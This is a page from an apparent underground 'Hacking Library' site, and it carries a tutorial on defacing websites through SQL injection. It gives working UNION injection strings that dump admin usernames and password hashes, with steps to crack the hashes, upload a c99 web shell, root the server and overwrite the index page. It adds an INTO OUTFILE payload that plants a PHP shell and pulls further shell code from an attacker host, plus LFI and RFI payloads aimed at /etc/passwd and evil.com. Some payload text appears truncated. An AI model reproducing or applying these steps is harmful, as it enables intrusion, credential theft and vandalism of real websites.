Magazine posts:
Files available: 		38
293
Hacking Library
Main page
Library magazine
Text archives
Trojans related
Password related
Messenger related
IRC related
Virus related
Web bug scanners
Nukers/Flooders
IP Scanners
Security area
Webmasters area
Missing files
About us
Contact us
Links / Affiliates
.
Underground Libra
DDLbyte.com
Macintosh UG List
Warez Downloads
Progenic Toplist
r00t Security
Suck-O Community
haxxx.net
Direct Downloads
.
Hacking Library password
 Global tip
Library
Donate to unlock the passworded files and support us!
Library
 
 Most recent posted
  Google's spyware! Aug/8
  Virus spreadingFeb/18
  Setup iStealer for PHP loggingFeb/13
  Password grabbersFeb/12
  Keylogging passwordsFeb/11
  Steal logins with fake sitesAug/3
  Hidden programs in WindowsJul/21
  DoS Attack tutorialJul/18
  SQL Injections tutorialJul/18
  Another phishing tutorialJul/18
  Phishing tutorial Jul/18
  Defacing a website Jul/18
  Whats is hacking? How its done?Jul/18
  Telnet hacking tutorialJul/17
  Simple cmd.exe tricks for startersJul/17
  Hacking a Network ComputerJul/17
  Basics of PHPJul/10
  What is a hacker? Jul/10
  Find an IP address Jul/10
  How a trojan/rat works in few words Jul/10
  How to catch a hacker Jul/10
  Few words about exploits Jul/10
.
Library magazine		 
Okay, many people still want to know how to deface websites via SQL Injection.
Its not always possible, but if you have a target, lets see what we can do.
Read below!

PS: You may think this document is small, but its just that easy !! ;)

As there are many ways to deface websites like;
Keylogging the webmaster of a website you want to hack. Not an easy way!
You can try LF (Local File Inclusion , script.php?page=../../../../etc/passwd%00 for example )
Webbased applications , you can use milw0rm.com for checking vulnerabilties :) Thanks str0ke!
Also RFI (Remote File Inclusion , script.php?page=http://www.evil.com/shell.txt? )
XSS Cookie Grabbing and ClickJacking.

But I will describe , how to deface a website which is vulnerable to SQL Injection!

Lets checkout the simple way!
1. Find out the column and table name:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(table_name) from 
information_schema.tables where table_schema=database()--
script.php?id=-1 union all select 1,2,3,4,5,group_concat(column_name) from 
information_schema.columns where table_schema=database()--

Oke , probably there is a table named admin_users, and 2 columns named admin_name & 
admin_pass.

Lets get the data from it:
script.php?id=-1 union all select 1,2,3,4,5,group_concat(admin_name,0x3a,admin_pass),7,8,
9,10 from admin_users--

If its a hash (32 characters) ,use http://www.gdataonline.com, http://www.tmto.org/search/ 
or http://www.milw0rm.com/cracker to crack the hash!

2. Log into the admin panel.

3. Try to find something , where you can upload things. Like albums or something.
Because album/image are many times writeable!

4. Upload a shell.PHP (not .txt, use .txt when you do RFI (Remote File Inclusion) for example.
Now go to your uploaded shell , site.com/c99.php , and if its possible, root it! (check some 
available exploits at milw0rm.com)

5. Change the index.html/php/asp or w/e if its writeable, to your own choice! :D

How to deface via SQL injection when magic_quotes are on and you find out the path of the 
server (ex. /home/www/site.com/public_html):
1. Use the infected column number, for example 7 :
site.com/script.php?id=-1 union all select 1,2,3,4,5,6,"",8,9,10 INTO OUTFILE 
'/home/www/site.com/public_html/images/shell.php'--

use /images/ because this dir is almost always writeable.
2. now you can give parameters to shell.php, like:
http://www.site.com/images/shell.php?o=c...ls/c99.txt

This creates a file name c99.php with the content of 
http://www.EVILSITE.COM/shells/c99.txt.

3. Guess !! Yes!!!! you can access your shell now via http://www.site.com/images/c99.php :D
Now go to your uploaded shell , site.com/images/c99.php , and if its possible, root it! (check
some available exploits at milw0rm.com)

By ©Darkc0ke :)
 Library
Library